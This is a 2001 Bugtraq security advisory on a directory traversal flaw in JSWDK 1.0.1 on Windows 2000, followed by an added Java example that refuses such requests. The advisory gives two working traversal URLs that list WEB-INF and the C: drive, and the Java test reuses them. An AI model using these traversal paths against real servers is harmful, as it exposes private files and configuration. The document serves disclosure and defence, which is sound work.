From lovehacker@263.NET Wed Mar 28 19:02:11 2001
From: lovehacker
To: BUGTRAQ@SECURITYFOCUS.COM
Date: Wed, 28 Mar 2001 06:48:07 -0000
Subject: [BUGTRAQ] CHINANSL Security Advisory(CSA-200106)

Topic:
JavaServer Web Dev Kit (JSWDK) 1.0.1 for Win2000 Directory Traversal Vulnerability

Vulnerable:
Microsoft Win2000 + JSWDK 1.0.1, possibly other operating systems as well.

Discussion:
A security vulnerability has been found in Windows NT/2000 systems that have JSWDK 1.0.1 installed. The vulnerability allows remote attackers to access files outside the document root directory.

Exploits:
http://localhost:8080/examples//WEB-INF/
Lists the /WEB-INF/ directory.

http://localhost:8080/../examples//WEB-INF/../../../../../
If JSWDK is installed in c:\, the request lists all files and directories in c:\.

Solution:
Update JSWDK.

Copyright 2000-2001 CHINANSL. All Rights Reserved. Terms of use.

CHINANSL Security Team
CHINANSL INFORMATION TECHNOLOGY CO.,LTD (http://www.chinansl.com)
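
An added example, not part of the advisory and not JSWDK code: one way a Java web server can map a request path to a file so that both requests above are refused. The class name `DocRootGuard`, the method `resolve` and the `webpages` root are hypothetical; the path is assumed to be already percent-decoded, and refusing `WEB-INF`/`META-INF` at any depth is this example's choice.

```java
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Locale;

public class DocRootGuard {
    // Returns the file under docRoot for an already percent-decoded request
    // path, or null when the request must be refused.
    static Path resolve(Path docRoot, String decodedPath) {
        // On Windows '\' is also a separator and ':' names drives and streams.
        if (decodedPath.indexOf('\\') >= 0 || decodedPath.indexOf(':') >= 0) {
            return null;
        }
        Path root = docRoot.toAbsolutePath().normalize();
        Path current = root;
        try {
            for (String seg : decodedPath.split("/")) {
                if (seg.isEmpty() || seg.equals(".")) continue; // "//" and "/./"
                if (seg.equals("..")) {
                    // Refuse to climb above the document root.
                    if (current.equals(root)) return null;
                    current = current.getParent();
                    continue;
                }
                // Windows ignores trailing dots and spaces and is case-insensitive.
                String name = seg.replaceAll("[. ]+$", "").toLowerCase(Locale.ROOT);
                if (name.isEmpty() || name.equals("web-inf") || name.equals("meta-inf")) {
                    return null;
                }
                current = current.resolve(seg);
            }
        } catch (InvalidPathException e) {
            return null; // NUL bytes or characters the file system rejects
        }
        // Defence in depth: the result must still sit under the root.
        return current.startsWith(root) ? current : null;
    }

    public static void main(String[] args) {
        Path root = Paths.get("webpages"); // constructed document root
        String[] samples = { // the two advisory paths plus one ordinary request
            "/examples//WEB-INF/",
            "/../examples//WEB-INF/../../../../../",
            "/examples/jsp/index.html",
        };
        for (String s : samples) {
            System.out.println(s + " -> " + (resolve(root, s) == null ? "REFUSED" : "served"));
        }
    }
}
```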